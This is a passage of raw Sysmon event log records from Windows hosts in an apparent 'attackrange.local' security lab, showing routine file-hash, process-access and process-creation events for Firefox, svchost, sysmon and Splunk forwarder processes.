Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=31060F620A042B5E841BEBA4696BF0B7,SHA256=DB9BD5BF8746C2ECF66F682CABDBDB6FB61871A15ED74F6AEAA6D8C6532ED2D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107330Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:33.449{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=E3A447DBB142D290AE0D623120E3BEE1,SHA256=34B3452E009FA98FD3170F55A3A98B776EBE35EB30933111CA66518D11633B0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107329Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:33.449{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=4C1E77B2014732477D5DF5B3AD0BA724,SHA256=A5641DC7ED0659FB174832CE9371FAC8979397F90D90CD8F624A348E82DBDFF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107328Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:33.449{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=5350DFC0B279F42A00AE39C442D2B355,SHA256=A187739635FED96D5E44D2814C2D6FDED5BC2BA627B3AFFD5162B05E48D46CB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107327Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:33.449{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=33A75CFA682CA2555C47AFD857B122D1,SHA256=BED0384C97B5B39574DEEDBC21BB1B9DEDD57B27158051E49CE6E681A721328D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107326Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:33.079{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9626619CF5A695F6057C2D0CBDBD556D,SHA256=8B315BCCFA400AA37D9336199853B4CC1C006B06B7DF392C785E71EC69A5277A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083384Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:33.023{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B4DD-615A-9101-00000000FD01}1636C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083383Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:33.023{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083382Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:33.023{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083381Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:33.023{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083380Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:33.023{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083379Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:33.023{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083378Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:33.023{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083377Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:33.023{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083376Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:33.023{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083375Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:33.023{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083374Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:33.023{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B4DD-615A-9101-00000000FD01}1636C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083373Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:33.023{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B4DD-615A-9101-00000000FD01}1636C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083372Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:33.024{2FDD8D40-B4DD-615A-9101-00000000FD01}1636C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000083402Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:34.648{2FDD8D40-B4DE-615A-9201-00000000FD01}32481212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083401Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:34.492{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B4DE-615A-9201-00000000FD01}3248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083400Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:34.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083399Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:34.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083398Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:34.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083397Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:34.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083396Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:34.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083395Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:34.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083394Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:34.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083393Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:34.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083392Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 